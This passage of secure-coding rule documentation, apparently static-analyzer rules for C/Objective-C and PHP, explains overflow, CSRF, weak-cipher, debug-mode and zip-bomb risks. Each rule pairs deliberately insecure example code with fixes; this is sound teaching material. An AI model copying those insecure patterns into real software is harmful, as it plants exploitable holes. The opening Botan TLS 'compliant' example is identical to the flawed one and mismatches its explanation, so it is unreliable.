    Callbacks callbacks;
    Botan::AutoSeeded_RNG rng;
    Botan::TLS::Session_Manager_In_Memory session_mgr(rng);
    Client_Credentials creds;
    Botan::TLS::Strict_Policy policy;

    Botan::TLS::Client client(callbacks, session_mgr, creds, policy, rng,
                              Botan::TLS::Server_Information("example.com", 443),
                              Botan::TLS::Protocol_Version::TLS_V12); // Noncompliant
}

Compliant solution

#include <botan/tls_client.h>
#include <botan/tls_callbacks.h>
#include <botan/tls_session_manager.h>
#include <botan/tls_policy.h>
#include <botan/auto_rng.h>
#include <botan/certstor.h>
#include <botan/certstor_system.h>

class Callbacks : public Botan::TLS::Callbacks { };

class Client_Credentials : public Botan::Credentials_Manager { };

void connect() {
    Callbacks callbacks;
    Botan::AutoSeeded_RNG rng;
    Botan::TLS::Session_Manager_In_Memory session_mgr(rng);
    Client_Credentials creds;
    Botan::TLS::Strict_Policy policy;

    Botan::TLS::Client client(callbacks, session_mgr, creds, policy, rng,
                              Botan::TLS::Server_Information("example.com", 443),
                              Botan::TLS::Protocol_Version::TLS_V12);
}

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.

Resources

Documentation

Standards

objc:S5801

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strcpy(char * restrict dest, const char * restrict src); copies characters from src to dest. The wcscpy does the same for wide characters and should be used with the same guidelines.

Note: the functions strncpy and wcsncpy might look like attractive safe replacements for strcpy and wcscpy, but they have their own set of issues (see S5816), and you should probably prefer a better-suited alternative.

Ask Yourself Whether

  • There is a possibility that either the source or the destination pointer is null
  • There is a possibility that the source string is not correctly null-terminated, or that its length (including the final null character) can be larger than the size of the destination buffer.
  • There is an overlap between source and destination

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • C11 provides, in its annex K, the strcpy_s and the wcscpy_s functions that were designed as safer alternatives to strcpy and wcscpy. Using them in all circumstances is not recommended, because they introduce a runtime overhead and require more error-handling code, but they perform checks that limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions, for example, strlcpy in FreeBSD
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strcpy(dest, src); // Sensitive: might overflow
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char *dest = malloc(strlen(src) + 1); // For the final 0
  strcpy(dest, src); // Compliant: we made sure the buffer is large enough
  int r = doSomethingWith(dest);
  free(dest);
  return r;
}

See

objc:S5802

The purpose of creating a jail, the "virtual root directory" created with chroot-type functions, is to limit access to the file system by isolating the process inside this jail. However, many chroot implementations don’t modify the current working directory, so the process still has access to unauthorized resources outside of the "jail".

Ask Yourself Whether

  • The application changes the working directory before or after running chroot.
  • The application uses a path inside the jail directory as working directory.

There is a risk if you answered no to any of those questions.

Recommended Secure Coding Practices

Change the current working directory to the root directory after switching to a jail directory.

Sensitive Code Example

The current directory is not changed with the chdir function before or after the creation of a jail with the chroot function:

const char* root_dir = "/jail/";
chroot(root_dir); // Sensitive: no chdir before or after chroot, and missing check of return value

The chroot or chdir operations could fail, leaving the process with access to unauthorized resources. The return code should be checked:

const char* root_dir = "/jail/";
chroot(root_dir); // Sensitive: missing check of the return value
const char* any_dir = "/any/";
chdir(any_dir); // Sensitive: missing check of the return value

Compliant Solution

To correctly isolate the application into a jail, change the current directory with chdir before the chroot and check the return code of both functions:

const char* root_dir = "/jail/";

if (chdir(root_dir) == -1) {
  exit(-1);
}

if (chroot(root_dir) == -1) {  // compliant: the current dir is changed to the jail and the results of both functions are checked
  exit(-1);
}

See

php:S2115

Why is this an issue?

When relying on the password authentication mode for the database connection, a secure password should be chosen.

This rule raises an issue when an empty password is used.

Noncompliant code example

// example of an empty password when connecting to a mysql database
$conn = new mysqli($servername, $username, "");

Compliant solution

// generate a secure password, set it for the username in the database, and store it in an environment variable, for instance
$password = getenv('MYSQL_SECURE_PASSWORD');
// then connect to the database
$conn = new mysqli($servername, $username, $password);

Resources

php:S4502

A cross-site request forgery (CSRF) attack occurs when a trusted user of a web application can be forced, by an attacker, to perform sensitive actions that they did not intend, such as updating their profile or sending a message; more generally, anything that can change the state of the application.

The attacker can trick the victim into clicking a link corresponding to the privileged action, or into visiting a malicious web site that embeds a hidden web request; because web browsers automatically include cookies, the action is performed as the authenticated user.

Ask Yourself Whether

  • The web application uses cookies to authenticate users.
  • There exist sensitive operations in the web application that can be performed when the user is authenticated.
  • The state / resources of the web application can be modified by doing HTTP POST or HTTP DELETE requests for example.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Protection against CSRF attacks is strongly recommended:
    • to be activated by default for all unsafe HTTP methods.
    • implemented, for example, with an unguessable CSRF token
  • Of course, sensitive operations should never be performed with safe HTTP methods like GET, which are designed to be used only for information retrieval.

Sensitive Code Example

For Laravel VerifyCsrfToken middleware

use Illuminate\Foundation\Http\Middleware\VerifyCsrfToken as Middleware;

class VerifyCsrfToken extends Middleware
{
    protected $except = [
        'api/*'
    ]; // Sensitive; disable CSRF protection for a list of routes
}

For Symfony Forms

use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;

class Controller extends AbstractController {

  public function action() {
    $this->createForm('', null, [
      'csrf_protection' => false, // Sensitive; disable CSRF protection for a single form
    ]);
  }
}

Compliant Solution

For Laravel VerifyCsrfToken middleware

use Illuminate\Foundation\Http\Middleware\VerifyCsrfToken as Middleware;

class VerifyCsrfToken extends Middleware
{
    protected $except = []; // Compliant
}

Remember to add the @csrf Blade directive to the relevant forms when removing an element from $except. Otherwise the form submission will stop working.

For Symfony Forms

use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;

class Controller extends AbstractController {

  public function action() {
    $this->createForm('', null, []); // Compliant; CSRF protection is enabled by default
  }
}

See

php:S4508

This rule is deprecated, and will eventually be removed.

Deserializing objects is security-sensitive; it has led to vulnerabilities in the past.

Object deserialization from an untrusted source can lead to unexpected code execution. Deserialization takes a stream of bits and turns it into an object. If the stream contains the type of object you expect, all is well. But if you’re deserializing data coming from untrusted input, and an attacker has inserted some other type of object, you’re in trouble. Why? A known attack scenario involves the creation of a serialized PHP object with crafted attributes that will modify your application’s behavior. This attack relies on PHP magic methods like __destruct, __wakeup or __toString. The attacker doesn’t necessarily need the source code of the targeted application to exploit the vulnerability; they can also rely on the presence of open-source components and use tools to craft malicious payloads.

Ask Yourself Whether

  • an attacker could have tampered with the source provided to the deserialization function
  • you are using an unsafe deserialization function

You are at risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

To prevent insecure deserialization, it is recommended to:

  • Use safe libraries that do not allow code execution at deserialization.
  • Not communicate with the outside world using serialized objects
  • Limit access to the serialized source
    • if it is a file, restrict the access to it.
    • if it comes from the network, restrict who has access to the process, such as with a Firewall or by authenticating the sender first.

See

php:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production. Debug instructions or error messages can leak detailed information about the system, like the application’s path or file names.

Ask Yourself Whether

  • The code or configuration enabling the application debug features is deployed on production servers or distributed to end users.
  • The application runs by default with debug features activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not enable debugging features on production servers or applications distributed to end users.

Sensitive Code Example

CakePHP 1.x, 2.x:

Configure::write('debug', 1); // Sensitive: development mode
or
Configure::write('debug', 2); // Sensitive: development mode
or
Configure::write('debug', 3); // Sensitive: development mode

CakePHP 3.0:

use Cake\Core\Configure;

Configure::write('debug', true); // Sensitive: development mode

WordPress:

define( 'WP_DEBUG', true ); // Sensitive: development mode

Compliant Solution

CakePHP 1.x, 2.x:

Configure::write('debug', 0); // Compliant; this is the production mode

CakePHP 3.0:

use Cake\Core\Configure;

Configure::write('debug', false); // Compliant: "0" or "false" (production mode) prevents leaking sensitive data in the logs

WordPress:

define( 'WP_DEBUG', false ); // Compliant

See

php:S5042

Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can lead to denial of service. A Zip bomb is usually a malicious archive of a few kilobytes of compressed data that expands into gigabytes of uncompressed data. To achieve this extreme compression ratio, attackers compress highly redundant data (e.g. a long string of repeated bytes).

Ask Yourself Whether

Archives to expand are untrusted and:

  • There is no validation of the number of entries in the archive.
  • There is no validation of the total size of the uncompressed data.
  • There is no validation of the ratio between the compressed and uncompressed archive entry.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Define and control the ratio between compressed and uncompressed data; in general, the compression ratio of most legitimate archives is between 1 and 3.
  • Define and control the threshold for maximum total size of the uncompressed data.
  • Count the number of file entries extracted from the archive and abort the extraction if that number exceeds a predefined threshold. In particular, it is not recommended to recursively expand archives (an entry of an archive could itself be an archive).

Sensitive Code Example

For ZipArchive module:

$zip = new ZipArchive();
if ($zip->open($file) === true) {
    $zip->extractTo('.'); // Sensitive
    $zip->close();
}

For Zip module:

$zip = zip_open($file);
while ($file = zip_read($zip)) {
    $filename = zip_entry_name($file);
    $size = zip_entry_filesize($file);

    if (substr($filename, -1) !== '/') {
        $content = zip_entry_read($file, zip_entry_filesize($file)); // Sensitive - zip_entry_read() uses zip_entry_filesize()
        file_put_contents($filename, $content);
    } else {
        mkdir($filename);
    }
}
zip_close($zip);

Compliant Solution

For ZipArchive module:

define('MAX_FILES', 10000);
define('MAX_SIZE', 1000000000); // 1 GB
define('MAX_RATIO', 10);
define('READ_LENGTH', 1024);

$fileCount = 0;
$totalSize = 0;

$zip = new ZipArchive();
if ($zip->open($file) === true) {
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $filename = $zip->getNameIndex($i);
        $stats = $zip->statIndex($i);

        if (strpos($filename, '../') !== false || substr($filename, 0, 1) === '/') {
            throw new Exception();
        }

        if (substr($filename, -1) !== '/') {
            $fileCount++;
            if ($fileCount > MAX_FILES) {
                // Reached max. number of files
                throw new Exception();
            }

            $fp = $zip->getStream($filename); // Compliant
            $currentSize = 0;
            while (!feof($fp)) {
                $currentSize += READ_LENGTH;
                $totalSize += READ_LENGTH;

                if ($totalSize > MAX_SIZE) {
                    // Reached max. size
                    throw new Exception();
                }

                // Additional protection: check compression ratio
                if ($stats['comp_size'] > 0) {
                    $ratio = $currentSize / $stats['comp_size'];
                    if ($ratio > MAX_RATIO) {
                        // Reached max. compression ratio
                        throw new Exception();
                    }
                }

                file_put_contents($filename, fread($fp, READ_LENGTH), FILE_APPEND);
            }

            fclose($fp);
        } else {
            mkdir($filename);
        }
    }
    $zip->close();
}

For Zip module:

define('MAX_FILES', 10000);
define('MAX_SIZE', 1000000000); // 1 GB
define('MAX_RATIO', 10);
define('READ_LENGTH', 1024);

$fileCount = 0;
$totalSize = 0;

$zip = zip_open($file);
while ($file = zip_read($zip)) {
    $filename = zip_entry_name($file);

    if (strpos($filename, '../') !== false || substr($filename, 0, 1) === '/') {
        throw new Exception();
    }

    if (substr($filename, -1) !== '/') {
        $fileCount++;
        if ($fileCount > MAX_FILES) {
            // Reached max. number of files
            throw new Exception();
        }

        $currentSize = 0;
        while ($data = zip_entry_read($file, READ_LENGTH)) { // Compliant
            $currentSize += READ_LENGTH;
            $totalSize += READ_LENGTH;

            if ($totalSize > MAX_SIZE) {
                // Reached max. size
                throw new Exception();
            }

            // Additional protection: check compression ratio
            if (zip_entry_compressedsize($file) > 0) {
                $ratio = $currentSize / zip_entry_compressedsize($file);
                if ($ratio > MAX_RATIO) {
                    // Reached max. compression ratio
                    throw new Exception();
                }
            }

            file_put_contents($filename, $data, FILE_APPEND);
        }
    } else {
        mkdir($filename);
    }
}
zip_close($zip);

See

php:S2278

This rule is deprecated; use S5547 instead.

Why is this an issue?

According to the US National Institute of Standards and Technology (NIST), the Data Encryption Standard (DES) is no longer considered secure:

Adopted in 1977 for federal agencies to use in protecting sensitive, unclassified information, the DES is being withdrawn because it no longer provides the security that is needed to protect federal government information.

Federal agencies are encouraged to use the Advanced Encryption Standard, a faster and stronger algorithm approved as FIPS 197 in 2001.

For similar reasons, RC2 should also be avoided.

Noncompliant code example

<?php
  $ciphertext = mcrypt_encrypt(MCRYPT_DES, $key, $plaintext, $mode); // Noncompliant
  // ...
  $ciphertext = mcrypt_encrypt(MCRYPT_DES_COMPAT, $key, $plaintext, $mode); // Noncompliant
  // ...
  $ciphertext = mcrypt_encrypt(MCRYPT_TRIPLEDES, $key, $plaintext, $mode); // Noncompliant
  // ...
  $ciphertext = mcrypt_encrypt(MCRYPT_3DES, $key, $plaintext, $mode); // Noncompliant

  $cipher = "des-ede3-cfb";  // Noncompliant
  $ciphertext_raw = openssl_encrypt($plaintext, $cipher, $key, $options=OPENSSL_RAW_DATA, $iv);
?>

Compliant solution

<?php
  $ciphertext = mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $key, $plaintext, MCRYPT_MODE_CBC, $iv);
?>
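
Note that the mcrypt extension used above is itself deprecated and was removed in PHP 7.2. On current PHP versions, an equivalent AES-based replacement could use the OpenSSL extension instead (a sketch; key storage and transport are out of scope):

```php
<?php
// AES-256 in GCM mode via OpenSSL (PHP >= 7.1 for the $tag parameter).
$key = random_bytes(32); // 256-bit key from a CSPRNG
$iv  = random_bytes(openssl_cipher_iv_length('aes-256-gcm'));
$tag = '';

$ciphertext = openssl_encrypt($plaintext, 'aes-256-gcm', $key,
                              OPENSSL_RAW_DATA, $iv, $tag);

// $iv and $tag are not secret; store them alongside the ciphertext,
// as both are required for decryption and integrity verification.
$decrypted = openssl_decrypt($ciphertext, 'aes-256-gcm', $key,
                             OPENSSL_RAW_DATA, $iv, $tag);
```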

Resources

php:S5547

This vulnerability makes it possible for the cleartext of the encrypted message to be recovered without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Mcrypt

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

mcrypt_encrypt(MCRYPT_DES, $key, $plaintext, $mode); // Noncompliant

Compliant solution

Mcrypt is deprecated and should not be used. You can use Sodium instead.

sodium_crypto_aead_aes256gcm_encrypt($plaintext, '', $nonce, $key);

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.

Resources

Standards

php:S5542

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

For AES, the weakest modes are CBC (Cipher Block Chaining) and ECB (Electronic Codebook), as they are either vulnerable to padding oracles or do not provide authentication mechanisms.

For RSA, the weakest configurations are using it without padding or with the PKCS#1 v1.5 padding scheme.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate possible impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Mcrypt

Code examples

Noncompliant code example

Example with a symmetric cipher, AES:

mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $key, $plaintext, "ecb"); // Noncompliant

Compliant solution

Mcrypt is deprecated and should not be used. You can use Sodium instead.

For the AES symmetric cipher, use the GCM mode:

sodium_crypto_aead_aes256gcm_encrypt($plaintext, '', $nonce, $key);

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

Appropriate choices are currently the following.

For AES: Use Galois/Counter mode (GCM)

GCM mode combines encryption with authentication and integrity checks using a cryptographic hash function and provides both confidentiality and authenticity of data.

Other similar modes are:

  • CCM: Counter with CBC-MAC
  • CWC: Carter-Wegman + CTR mode
  • EAX: Encrypt-and-Authenticate
  • IAPM: Integer Authenticated Parallelizable Mode
  • OCB: Offset Codebook Mode

It is also possible to use AES-CBC with HMAC for integrity checks. However, it is considered more straightforward to use AES-GCM directly instead.

For RSA: use the OAEP scheme

The Optimal Asymmetric Encryption Padding scheme (OAEP) adds randomness and a secure hash function that strengthens the regular inner workings of RSA.

Resources

Articles & blog posts

Standards

php:S2277

This rule is deprecated; use S5542 instead.

Why is this an issue?

Without OAEP in RSA encryption, it takes less work for an attacker to decrypt the data or infer patterns from the ciphertext. This rule raises an issue when openssl_public_encrypt is used with one of the following padding constants: OPENSSL_NO_PADDING, OPENSSL_PKCS1_PADDING or OPENSSL_SSLV23_PADDING.

Noncompliant code example

function encrypt($data, $key) {
  $crypted='';
  openssl_public_encrypt($data, $crypted, $key, OPENSSL_NO_PADDING); // Noncompliant
  return $crypted;
}

Compliant solution

function encrypt($data, $key) {
  $crypted='';
  openssl_public_encrypt($data, $crypted, $key, OPENSSL_PKCS1_OAEP_PADDING);
  return $crypted;
}

Resources

php:S5876

Why is this an issue?

Session fixation attacks occur when an attacker can force a legitimate user to use a session ID that the attacker knows. To avoid fixation attacks, it’s a good practice to generate a new session each time a user authenticates and to delete/invalidate the existing session (the one possibly known by the attacker).
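
The same principle applies outside any framework: in plain PHP, regenerating the session ID at the moment of authentication discards any ID an attacker may have fixed beforehand. A minimal sketch (checkCredentials is a hypothetical helper):

```php
<?php
session_start();

if (checkCredentials($_POST['user'], $_POST['password'])) {
    // Issue a fresh session ID and delete the old session data,
    // invalidating any ID the attacker may have planted.
    session_regenerate_id(true);
    $_SESSION['authenticated'] = true;
}
```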

Noncompliant code example

In a Symfony Security's context, session fixation protection can be disabled with the value none for the session_fixation_strategy attribute:

namespace Symfony\Component\DependencyInjection\Loader\Configurator;

return static function (ContainerConfigurator $container) {
    $container->extension('security', [
        'session_fixation_strategy' => 'none', // Noncompliant
    ]);
};

Compliant solution

In a Symfony Security's context, session fixation protection is enabled by default. It can be explicitly enabled with the values migrate and invalidate for the session_fixation_strategy attribute:

namespace Symfony\Component\DependencyInjection\Loader\Configurator;

return static function (ContainerConfigurator $container) {
    $container->extension('security', [
        'session_fixation_strategy' => 'migrate', // Compliant
    ]);
};

Resources

php:S3336

Why is this an issue?

PHP’s session.use_trans_sid setting automatically appends the user’s session ID to URLs when cookies are disabled. On the face of it, this seems like a nice way to let cookie-less users use your site anyway. In reality, it makes those users vulnerable to having their sessions hijacked by anyone who might:

  • see the URL over the user’s shoulder
  • be sent the URL by the user
  • retrieve the URL from browser history
  • …

For that reason, it’s better to practice a little "tough love" with your users and force them to turn on cookies.

Since session.use_trans_sid is off by default, this rule raises an issue when it is explicitly enabled.

Noncompliant code example

; php.ini
session.use_trans_sid=1  ; Noncompliant
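
Since the setting is off by default, the compliant configuration simply leaves the default in place or disables it explicitly:

```ini
; php.ini
session.use_trans_sid=0  ; Compliant
```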

Resources

php:S4787

This rule is deprecated; use S4426, S5542, S5547 instead.

Encrypting data is security-sensitive. It has led to numerous vulnerabilities in the past.

Proper encryption requires both the encryption algorithm and the key to be strong. Obviously, the private key needs to remain secret and be renewed regularly. However, these are not the only means to defeat or weaken an encryption scheme.

This rule flags function calls that initiate encryption/decryption.

Ask Yourself Whether

  • the private key might not be random or strong enough, or the same key might be reused for a long time.
  • the private key might be compromised. It can happen when it is stored in an unsafe place or when it was transferred in an unsafe manner.
  • the key exchange is made without properly authenticating the receiver.
  • the encryption algorithm is not strong enough for the level of protection required. Note that encryption algorithms strength decreases as time passes.
  • the chosen encryption library is deemed unsafe.
  • a nonce is used, and the same value is reused multiple times, or the nonce is not random.
  • the RSA algorithm is used, and it does not incorporate an Optimal Asymmetric Encryption Padding (OAEP), which might weaken the encryption.
  • the CBC (Cipher Block Chaining) algorithm is used for encryption, and its IV (Initialization Vector) is not generated using a secure random algorithm, or it is reused.
  • the Advanced Encryption Standard (AES) encryption algorithm is used with an insecure mode. See the recommended practices for more information.

You are at risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Generate encryption keys using secure random algorithms.
  • When generating cryptographic keys (or key pairs), it is important to use a key length that provides enough entropy against brute-force attacks. For the Blowfish algorithm the key should be at least 128 bits long, while for the RSA algorithm it should be at least 2048 bits long.
  • Regenerate the keys regularly.
  • Always store the keys in a safe location and transfer them only over safe channels.
  • If there is an exchange of cryptographic keys, check first the identity of the receiver.
  • Only use strong encryption algorithms. Check regularly that the algorithm is still deemed secure. It is also imperative that they are implemented correctly. Use only encryption libraries which are deemed secure. Do not define your own encryption algorithms as they will most probably have flaws.
  • When a nonce is used, generate it randomly every time.
  • When using the RSA algorithm, incorporate an Optimal Asymmetric Encryption Padding (OAEP).
  • When CBC is used for encryption, the IV must be random and unpredictable. Otherwise it exposes the encrypted value to cryptanalysis attacks like "Chosen-Plaintext Attacks". Thus a secure random algorithm should be used. An IV value should be associated with one and only one encryption cycle, because the IV’s purpose is to ensure that the same plaintext encrypted twice will yield two different ciphertexts.
  • The Advanced Encryption Standard (AES) encryption algorithm can be used with various modes. Galois/Counter Mode (GCM) with no padding should be preferred to the following combinations, which are not secure:
    • Electronic Codebook (ECB) mode: Under a given key, any given plaintext block always gets encrypted to the same ciphertext block. Thus, it does not hide data patterns well. In some senses, it doesn’t provide serious message confidentiality, and it is not recommended for use in cryptographic protocols at all.
    • Cipher Block Chaining (CBC) with PKCS#5 padding (or PKCS#7) is susceptible to padding oracle attacks.
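
Taken together, the practices above (a random key, a fresh random nonce for every message, and an authenticated mode) can be sketched with the Sodium extension bundled with PHP since 7.2 (an illustration, not the only valid setup):

```php
<?php
// 256-bit key from a CSPRNG; store it safely and rotate it regularly.
$key = sodium_crypto_secretbox_keygen();

// A fresh random nonce for every single encryption; never reuse one.
$nonce = random_bytes(SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);

// Authenticated encryption: tampering is detected on decryption.
$ciphertext = sodium_crypto_secretbox($plaintext, $nonce, $key);

// The nonce is not secret and is stored next to the ciphertext.
$decrypted = sodium_crypto_secretbox_open($ciphertext, $nonce, $key);
```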

Sensitive Code Example

Builtin functions

function myEncrypt($cipher, $key, $data, $mode, $iv, $options, $padding, $infile, $outfile, $recipcerts, $headers, $nonce, $ad, $pub_key_ids, $env_keys)
{
    mcrypt_ecb ($cipher, $key, $data, $mode); // Sensitive
    mcrypt_cfb($cipher, $key, $data, $mode, $iv); // Sensitive
    mcrypt_cbc($cipher, $key, $data, $mode, $iv); // Sensitive
    mcrypt_encrypt($cipher, $key, $data, $mode); // Sensitive

    openssl_encrypt($data, $cipher, $key, $options, $iv); // Sensitive
    openssl_public_encrypt($data, $crypted, $key, $padding); // Sensitive
    openssl_pkcs7_encrypt($infile, $outfile, $recipcerts, $headers); // Sensitive
    openssl_seal($data, $sealed_data, $env_keys, $pub_key_ids); // Sensitive

    sodium_crypto_aead_aes256gcm_encrypt ($data, $ad, $nonce, $key); // Sensitive
    sodium_crypto_aead_chacha20poly1305_encrypt ($data, $ad, $nonce, $key); // Sensitive
    sodium_crypto_aead_chacha20poly1305_ietf_encrypt ($data, $ad, $nonce, $key); // Sensitive
    sodium_crypto_aead_xchacha20poly1305_ietf_encrypt ($data, $ad, $nonce, $key); // Sensitive
    sodium_crypto_box_seal ($data, $key); // Sensitive
    sodium_crypto_box ($data, $nonce, $key); // Sensitive
    sodium_crypto_secretbox ($data, $nonce, $key); // Sensitive
    sodium_crypto_stream_xor ($data, $nonce, $key); // Sensitive
}

CakePHP

use Cake\Utility\Security;

function myCakeEncrypt($key, $data, $engine)
{
    Security::encrypt($data, $key); // Sensitive

    // Do not use custom made engines and remember that Mcrypt is deprecated.
    Security::engine($engine); // Sensitive. Setting the encryption engine.
}

CodeIgniter

class EncryptionController extends CI_Controller
{
    public function __construct()
    {
        parent::__construct();
        $this->load->library('encryption');
    }

    public function index()
    {
        $this->encryption->create_key(16); // Sensitive. Review the key length.
        $this->encryption->initialize( // Sensitive.
            array(
                'cipher' => 'aes-256',
                'mode' => 'ctr',
                'key' => 'the key',
            )
        );
        $this->encryption->encrypt("mysecretdata"); // Sensitive.
    }
}

CraftCMS version 3

use Craft;

// This is similar to Yii as it used by CraftCMS
function craftEncrypt($data, $key, $password) {
    Craft::$app->security->encryptByKey($data, $key); // Sensitive
    Craft::$app->getSecurity()->encryptByKey($data, $key); // Sensitive
    Craft::$app->security->encryptByPassword($data, $password); // Sensitive
    Craft::$app->getSecurity()->encryptByPassword($data, $password); // Sensitive
}

Drupal 7 - Encrypt module

function drupalEncrypt() {
    $encrypted_text = encrypt('some string to encrypt'); // Sensitive
}

Joomla

use Joomla\Crypt\CipherInterface;

abstract class MyCipher implements CipherInterface // Sensitive. Implementing custom cipher class
{}

function joomlaEncrypt() {
    new Joomla\Crypt\Cipher_Sodium(); // Sensitive
    new Joomla\Crypt\Cipher_Simple(); // Sensitive
    new Joomla\Crypt\Cipher_Rijndael256(); // Sensitive
    new Joomla\Crypt\Cipher_Crypto(); // Sensitive
    new Joomla\Crypt\Cipher_Blowfish(); // Sensitive
    new Joomla\Crypt\Cipher_3DES(); // Sensitive
}

Laravel

use Illuminate\Support\Facades\Crypt;

function myLaravelEncrypt($data)
{
    Crypt::encryptString($data); // Sensitive
    Crypt::encrypt($data); // Sensitive
    // encrypt using the Laravel "encrypt" helper
    encrypt($data); // Sensitive
}

PHP-Encryption library

use Defuse\Crypto\Crypto;
use Defuse\Crypto\File;

function myPhpEncryption($data, $key, $password, $inputFilename, $outputFilename, $inputHandle, $outputHandle) {
    Crypto::encrypt($data, $key); // Sensitive
    Crypto::encryptWithPassword($data, $password); // Sensitive
    File::encryptFile($inputFilename, $outputFilename, $key); // Sensitive
    File::encryptFileWithPassword($inputFilename, $outputFilename, $password); // Sensitive
    File::encryptResource($inputHandle, $outputHandle, $key); // Sensitive
    File::encryptResourceWithPassword($inputHandle, $outputHandle, $password); // Sensitive
}

PhpSecLib

function myphpseclib($mode) {
    new phpseclib\Crypt\RSA(); // Sensitive. Note: RSA can also be used for signing data.
    new phpseclib\Crypt\AES(); // Sensitive
    new phpseclib\Crypt\Rijndael(); // Sensitive
    new phpseclib\Crypt\Twofish(); // Sensitive
    new phpseclib\Crypt\Blowfish(); // Sensitive
    new phpseclib\Crypt\RC4(); // Sensitive
    new phpseclib\Crypt\RC2(); // Sensitive
    new phpseclib\Crypt\TripleDES(); // Sensitive
    new phpseclib\Crypt\DES(); // Sensitive

    new phpseclib\Crypt\AES($mode); // Sensitive
    new phpseclib\Crypt\Rijndael($mode); // Sensitive
    new phpseclib\Crypt\TripleDES($mode); // Sensitive
    new phpseclib\Crypt\DES($mode); // Sensitive
}

Sodium Compat library

function mySodiumCompatEncrypt($data, $ad, $nonce, $key) {
    ParagonIE_Sodium_Compat::crypto_aead_chacha20poly1305_ietf_encrypt($data, $ad, $nonce, $key); // Sensitive
    ParagonIE_Sodium_Compat::crypto_aead_xchacha20poly1305_ietf_encrypt($data, $ad, $nonce, $key); // Sensitive
    ParagonIE_Sodium_Compat::crypto_aead_chacha20poly1305_encrypt($data, $ad, $nonce, $key); // Sensitive

    ParagonIE_Sodium_Compat::crypto_aead_aes256gcm_encrypt($data, $ad, $nonce, $key); // Sensitive

    ParagonIE_Sodium_Compat::crypto_box($data, $nonce, $key); // Sensitive
    ParagonIE_Sodium_Compat::crypto_secretbox($data, $nonce, $key); // Sensitive
    ParagonIE_Sodium_Compat::crypto_box_seal($data, $key); // Sensitive
    ParagonIE_Sodium_Compat::crypto_secretbox_xchacha20poly1305($data, $nonce, $key); // Sensitive
}

Yii version 2

use Yii;

// Similar to CraftCMS as it uses Yii
function YiiEncrypt($data, $key, $password) {
    Yii::$app->security->encryptByKey($data, $key); // Sensitive
    Yii::$app->getSecurity()->encryptByKey($data, $key); // Sensitive
